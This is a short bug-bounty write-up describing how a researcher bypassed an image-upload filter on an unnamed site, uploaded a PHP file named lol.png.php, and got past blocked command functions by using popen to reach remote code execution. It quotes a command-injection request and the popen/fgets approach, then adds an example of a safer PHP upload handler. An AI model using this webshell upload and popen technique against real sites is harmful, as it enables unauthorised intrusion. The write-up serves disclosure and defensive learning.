File Upload to RCE
Hi, my name is Ahmed Magdy :)
and I will be publishing my first write-up, about a File Upload to RCE bug.
Let’s go……
First of all, this was a private program, so I will refer to it as example.com or subdomain.domain.
Here I can upload a normal photo.
All file uploads: Profile updated successfully :)
But it did not work with all of them.
After bypassing the upload filter, it worked.
Wait, some code in the file works and some does not.
example.com/uploads/ (ids user) /lol.png.php?c=ls;id;whoami;
And all the commands did not work.
HTML, JS and some PHP code worked, but all the parameters did not work. It is RCE, but all commands are blocked, but that is OK…
I reported this because I could print phpinfo(), severity P2.
After 2 days and more searching, I asked some friends, Abdalla Tarek and Flex, about this issue.
After ( Al habd Al gamed ) with Tarek
Flex gave me the solution to this problem:
resource popen ( command , $mode )
Opens a pipe to a process executed by forking the command given by command. Example: <?php $h = popen("ls","r"); ?>
string fgets ( file , length )
Returns a line from an open file. Example:
    $handle = fopen("inputfile.txt", "r");
    if ($handle) {
        while (($line = fgets($handle)) !== false) {
            // process the line read.
        }
        fclose($handle);
    } else {
        // error opening the file.
    }
The site got afraid and it worked after Flex's two lines,
and I wrote more than 20 lines and the site didn't get afraid or work.
I reported that as RCE and the severity became P1 …. :)
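The upload in this write-up was reachable as lol.png.php, so the stored file kept a .php extension taken from the client's file name. The following is an added example, not code from this write-up or from the affected site, of an upload handler that never uses the client's name; ALLOWED_TYPES, storedNameFor(), handleUpload() and the upload directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not the affected site's code. ALLOWED_TYPES, storedNameFor()
// and handleUpload() are hypothetical names; the upload directory is an assumption.
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

/**
 * Return a server-chosen file name for an uploaded image, or null to reject it.
 * The client-supplied name (for example "lol.png.php") is never used, so its
 * extensions cannot decide how the web server later handles the file.
 */
function storedNameFor(string $tmpPath): ?string
{
    // Detect the type from the file's bytes, not from its name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        return null;
    }
    // The bytes must also parse as an image of that same type.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== $mime) {
        return null;
    }
    // Random name plus an extension taken from the allow-list only.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
}

/** Store one entry of $_FILES; returns the stored name, or null if rejected. */
function handleUpload(array $file, string $uploadDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $name = storedNameFor($file['tmp_name']);
    if ($name === null) {
        return null;
    }
    // $uploadDir should sit outside the web root, or in a location where the
    // server is configured never to run PHP, so stored files are served as data.
    return move_uploaded_file($file['tmp_name'], $uploadDir . '/' . $name) ? $name : null;
}
```

An image that still carries embedded PHP text passes these checks, which is why the stored extension and a non-executing upload directory matter more than the content check.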
Thank you for your time :)
And finally, thank you for reading this write-up :)
Have a great day :)
I hope you enjoyed reading and I will be very happy if you have any feedback!!
Contact me if you want: Ahmed Magdy